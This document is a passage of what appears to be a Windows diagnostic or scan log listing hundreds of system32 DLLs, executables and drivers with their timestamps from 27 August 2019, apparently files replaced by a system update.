2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\mf3216.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\kdnet.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\imm32.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\fontsub.dll
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\tcpip.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\srvnet.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\srv2.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\rdbss.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\partmgr.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\ntfs.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\netio.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\ndis.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\mrxsmb20.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\FWPKCLNT.SYS
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\fltMgr.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\drivers\Classpnp.sys
2019-08-27 19:25:17 ----A---- C:\WINDOWS\system32\bcryptprimitives.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\SYSWOW64\bcryptprimitives.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\WSReset.exe
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\WPTaskScheduler.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\wisp.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\wdigest.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\UpgradeResultsUI.exe
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\uDWM.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\twinui.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\TSWorkspace.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\TokenBrokerUI.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\sxssrv.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\sppcommdlg.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\rpcrt4.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\RADCUI.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\phoneactivate.exe
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\NetSetupEngine.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\NetSetupApi.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\LicensingUI.exe
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\dwmredir.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\dwmcore.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\drivers\msrpc.sys
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\drivers\afd.sys
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\dmvdsitf.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\dcomp.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\dab.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\CoreShellExtFramework.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\CoreShell.dll
2019-08-27 19:25:16 ----A---- C:\WINDOWS\system32\ComposableShellProxyStub.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\Windows.UI.Logon.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\vdsbas.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\ubpm.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\taskhostw.exe
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\taskcomp.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\SRH.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\sppc.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\spopk.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\SndVolSSO.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\slui.exe
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\schedsvc.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\RpcPing.exe
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\mfc42u.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\mfc42.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\LicensingWinRT.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\kernel32.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\InputSwitch.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\fdBth.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\dwmapi.dll
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\drivers\cldflt.sys
2019-08-27 19:25:13 ----A---- C:\WINDOWS\system32\bootux.dll
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\Win32CompatibilityAppraiserCSP.dll
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\wimserv.exe
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\wimgapi.dll
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\uReFS.dll
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\Taskmgr.exe
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\srpapi.dll
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\refsutil.exe
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\ole32.dll
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\drivers\refsv1.sys
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\drivers\refs.sys
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\drivers\fileinfo.sys
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\drivers\appid.sys
2019-08-27 19:25:12 ----A---- C:\WINDOWS\system32\apphelp.dll
2019-08-27 19:25:11 ----A---- C:\WINDOWS\system32\Windows.Data.Activities.dll
2019-08-27 19:25:11 ----A---- C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2019-08-27 19:25:11 ----A---- C:\WINDOWS\system32\SettingsHandlers_ManagePhone.dll
2019-08-27 19:25:11 ----A---- C:\WINDOWS\system32\SettingsHandlers_Language.dll
2019-08-27 19:25:11 ----A---- C:\WINDOWS\system32\QuietHours.dll
2019-08-27 19:25:11 ----A---- C:\WINDOWS\system32\NotificationControllerPS.dll
2019-08-27 19:25:11 ----A---- C:\WINDOWS\system32\NotificationController.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\Windows.SharedPC.CredentialProvider.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\twinui.pcshell.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\SharedPCCSP.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\SettingsHandlers_PCDisplay.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\PhoneService.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\NetworkMobileSettings.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\DesktopSwitcherDataModel.dll
2019-08-27 19:25:10 ----A---- C:\WINDOWS\system32\ApplicationFrame.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\Windows.Media.Speech.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\VSSVC.exe
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\vssapi.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\setupcln.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\SettingSyncHost.exe
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\SettingSyncCore.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\OpenWith.exe
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\ntshrui.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\ngctasks.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\ExplorerFrame.dll
2019-08-27 19:25:09 ----A---- C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\sppwinob.dll
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\SppExtComObj.Exe
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\slcext.dll
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\shunimpl.dll
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\pku2u.dll
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\pidgenx.dll
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\MBR2GPT.EXE
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\LicensingDiagSpp.dll
2019-08-27 19:25:06 ----A---- C:\WINDOWS\system32\comdlg32.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\XpsPrint.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\Windows.Graphics.Printing.Workflow.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\Windows.Graphics.Display.BrightnessOverride.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\Windows.Cortana.OneCore.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\vpnike.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\SystemSettings.Handlers.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\setupapi.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\SettingsHandlers_nt.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\services.exe
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\SensorsApi.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\scrrun.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\RMapi.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\rastapi.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\rasppp.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\rasmans.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\rasman.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\rascustom.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\rasapi32.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\prnntfy.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\npmproxy.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\notepad.exe
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\nlasvc.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\nlaapi.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\newdev.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\NetSetupShim.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\netprofmsvc.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\ncsi.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\msxml3.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\mprddm.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\mcbuilder.exe
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\iphlpsvc.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\ImplatSetup.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\drvinst.exe
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\drivers\wanarp.sys
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\drivers\netbt.sys
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\drivers\ndproxy.sys
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\cscdll.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\cscapi.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\system32\APMon.dll
2019-08-27 19:25:05 ----A---- C:\WINDOWS\notepad.exe
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\win32k.sys
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\user32.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\SensorService.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\NgcCtnr.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\ngccredprov.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\Microsoft.Bluetooth.Service.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\mdmregistration.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\MdmDiagnosticsTool.exe
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\lpkinstall.exe
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\LockController.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\LockAppBroker.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\LanguageComponentsInstaller.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\HttpsDataSource.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\drivers\WppRecorder.sys
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\drivers\WindowsTrustedRT.sys
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\drivers\npfs.sys
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\drivers\msfs.sys
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\drivers\luafv.sys
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\drivers\ks.sys
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\consent.exe
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\cmd.exe
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\bthserv.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\BTAGService.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\AxInstSv.dll
2019-08-27 19:25:04 ----A---- C:\WINDOWS\system32\AboveLockAppHost.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\Windows.Devices.Lights.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\TileDataRepository.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\tetheringservice.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\rmclient.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\rdpserverbase.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\rdpcore.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\rdpbase.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\psmsrv.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\PsmServiceExtHost.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\ngcsvc.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\ngcpopkeysrv.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\NgcCtnrSvc.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\moshostcore.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\MapsStore.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\MapRouter.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\MapGeocoder.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\MapControlCore.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\MapConfiguration.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\JpMapControl.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\ISM.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\InputHost.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\cryptngc.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\bisrv.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\BingOnlineServices.dll
2019-08-27 19:25:03 ----A---- C:\WINDOWS\system32\BingMaps.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\wpnsruprov.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\wpnprv.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\wpncore.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\wpnapps.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\Windows.System.Diagnostics.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\Windows.Services.TargetedContent.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\Windows.Graphics.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\UserDataTimeUtil.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\ttdwriter.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\ttdrecordcpu.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\storewuauth.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\msxml6.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\MbaeApiPublic.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\MbaeApi.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\InstallService.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\IKEEXT.DLL
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\FirewallAPI.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\drivers\wfplwfs.sys
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\drivers\mpsdrv.sys
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\coml2.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\cmintegrator.dll
2019-08-27 19:25:00 ----A---- C:\WINDOWS\system32\BFE.DLL
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\Windows.Devices.Picker.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\tquery.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\SearchIndexer.exe
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\SearchFilterHost.exe
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\mssprxy.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\mssph.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\msscntrs.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\InputService.dll
2019-08-27 19:24:59 ----A---- C:\WINDOWS\system32\InputLocaleManager.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\Windows.Devices.Enumeration.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\Windows.AI.MachineLearning.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\thumbcache.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\ShareHost.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\SearchProtocolHost.exe
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\mssvp.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\mssrch.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\gdi32.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\drivers\dxgmms2.sys
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\drivers\dxgmms1.sys
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\drivers\dxgkrnl.sys
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\DisplayManager.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\D3D12.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\d3d10warp.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\cdprt.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\CapabilityAccessManager.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\AssignedAccessRuntime.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\ActivationManager.dll
2019-08-27 19:24:58 ----A---- C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\wlidsvc.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.UI.Storage.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.UI.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.System.SystemManagement.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\windows.internal.shellcommon.shareexperience.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.Globalization.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.Devices.Radios.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.Data.Pdf.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\Windows.CloudStore.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\TokenBroker.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\smartscreenps.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\smartscreen.exe
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\qmgr.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\negoexts.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\modernexecserver.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\MicrosoftAccountTokenProvider.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\drivers\dam.sys
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\directmanipulation.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\DeviceSetupManager.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\cloudAP.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\cdpusersvc.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\cdpsvc.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\cdp.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\appsruprov.dll
2019-08-27 19:24:57 ----A---- C:\WINDOWS\system32\aadcloudap.dll
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\WsmSvc.dll
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\WSManMigrationPlugin.dll
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\WSManHTTPConfig.exe
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\wow64win.dll
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\SecurityHealthService.exe
2019-08-27 19:24:56 ----A---- C:\WINDOWS\system32\SecurityHealthAgent.dll
2019-08-27 19:24:53 ----A---- C:\WINDOWS\system32\WWAHost.exe
2019-08-27 19:24:53 ----A---- C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2019-08-27 19:24:53 ----A---- C:\WINDOWS\system32\StartTileData.dll
2019-08-27 19:24:53 ----A---- C:\WINDOWS\system32\smbwmiv2.dll
2019-08-27 19:24:53 ----A---- C:\WINDOWS\system32\ShellCommonCommonProxyStub.dll
2019-08-27 19:24:53 ----A---- C:\WINDOWS\system32\ReAgent.dll
2019-08-27 19:24:53 ----A---- C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\wscapi.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\wmicmiplugin.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\wlansvc.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\wlanmsm.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\wlanapi.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\Windows.Web.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\Windows.Networking.NetworkOperators.HotspotAuthentication.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\wcmsvc.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\spoolsv.exe
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\SettingsHandlers_StorageSense.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\SettingsHandlers_SIUF.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\oleprn.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\localspl.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\hmkd.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\drivers\WdiWiFi.sys
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\drivers\nwifi.sys
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\drivers\bowser.sys
2019-08-27 19:24:52 ----A---- C:\WINDOWS\system32\CredentialMigrationHandler.dll
2019-08-27 19:24:52 ----A---- C:\WINDOWS\splwow64.exe
2019-08-27 19:24:52 ----A---- C:\WINDOWS\explorer.exe
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\wpx.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\WpcTok.exe
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\WpcRefreshTask.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\WpcMon.exe
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\Windows.Internal.Signals.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\WiFiCloudStore.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\SpeechPal.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\SpatialAudioLicenseSrv.exe
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\RjvMDMConfig.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\provtool.exe
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\provops.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\provisioningcsp.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\provhandlers.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\provengine.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\provdatastore.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\MDMAgent.exe
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\kdcpw.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\FlightSettings.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\dsound.dll
